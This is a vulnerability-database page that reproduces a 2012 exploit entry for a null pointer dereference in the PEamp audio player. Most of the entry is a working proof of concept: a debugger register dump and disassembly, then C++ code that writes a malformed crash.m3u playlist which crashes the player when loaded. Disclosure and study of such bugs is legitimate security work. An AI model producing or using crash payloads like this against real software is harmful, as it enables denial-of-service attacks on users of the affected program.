Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PEamp Null Pointer Dereference PoC

🗓️ 09 Jun 2012 00:00:00Reported by AyrbyteType 
zdt
 zdt🔗 0day.today👁 18 Views

Null Pointer Dereference in PEamp audio playe

Code
/*Title: PEamp Null Pointer Dereference PoC
Author: Ayrbyte
Link: http:www.softpedia.com/get/Multimedia/Audio/Audio-Players/mp3player.shtml
Versi: v1.02b
Tested on: Windows 7
Fb: facebook.com/Ayrbyte
Greetz To : all CREMY Family, and for all indonesian indonesian h4x0r

    ??  %%  %% $$$$$        >>  > ::    ;;;;;;;;
   ?? ?  %% %% $$ $$ ||      >> > ::    ;;    ;;
  ?????   %%%% $$$$$ ||___    >>> ::::: ;;;;;;;
 ??   ??    %% $$$$  ||  ||     > ::    ;;
      %%%%%%%% $$ $$ ||__|| >>>>> ::::: ;;;;;;;;
    ______________>>Ayrbyte<<_______________
   Gamerz From CREMY | CRazy Experience arMY

[register]
eax=ffffffff ebx=76b0cc62 ecx=199dee10 edx=00000000 esi=03342d28 edi=0040141b
eip=750b736d esp=0012ed34 ebp=0012ed5c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246

[diasembly]
KERNELBASE!lstrlen:
750b7353 6a08            push    8
750b7355 6890730b75      push    offset KERNELBASE!lstrlen+0x3d (750b7390)
750b735a e841a3ffff      call    KERNELBASE!ReleaseMutex+0x3f (750b16a0)
750b735f 8b4508          mov     eax,dword ptr [ebp+8]
750b7362 85c0            test    eax,eax
750b7364 741f            je      KERNELBASE!lstrlen+0x32 (750b7385)
750b7366 8365fc00        and     dword ptr [ebp-4],0
750b736a 8d5001          lea     edx,[eax+1]
750b736d 8a08            mov     cl,byte ptr [eax]          ds:0023:ffffffff=?? <--NullPointer
750b736f 40              inc     eax
750b7370 84c9            test    cl,cl
750b7372 75f9            jne     KERNELBASE!lstrlen+0x1a (750b736d)
750b7374 2bc2            sub     eax,edx
750b7376 c745fcfeffffff  mov     dword ptr [ebp-4],0FFFFFFFEh
750b737d e86ea4ffff      call    KERNELBASE!WaitForSingleObjectEx+0xc0 (750b17f0)
750b7382 c20400          ret     4
750b7385 33c0            xor     eax,eax
750b7387 ebf4            jmp     KERNELBASE!lstrlen+0x2a (750b737d)

*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\KERNELBASE.dll - 
KERNELBASE!lstrlen+0x1a:
eax overwrite with ffffffff, in offset 750b736d, (mov cl,byte ptr [eax]) ds:0023:ffffffff=?? <--Null Pointer Dereference
*/
//Poc :
#include <iostream>
using namespace std;
//WARNING: for first load crash.m3u after that klik "add" or "load" or "save" 
//it will make program be crash
char _isi[] =   "http://.";
char _A[] = "\xFF";
int main(){
    FILE *_file;
    #define _namefile "crash.m3u"
    _file = fopen(_namefile, "w");
    fputs(_isi, _file);
    for(int i=0;i<1337;i++){fputs(_A, _file);}
    fclose(_file);
    return 0; 
}




#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Jun 2012 00:00Current
7High risk
Vulners AI Score7
peampaudio playernull pointer
18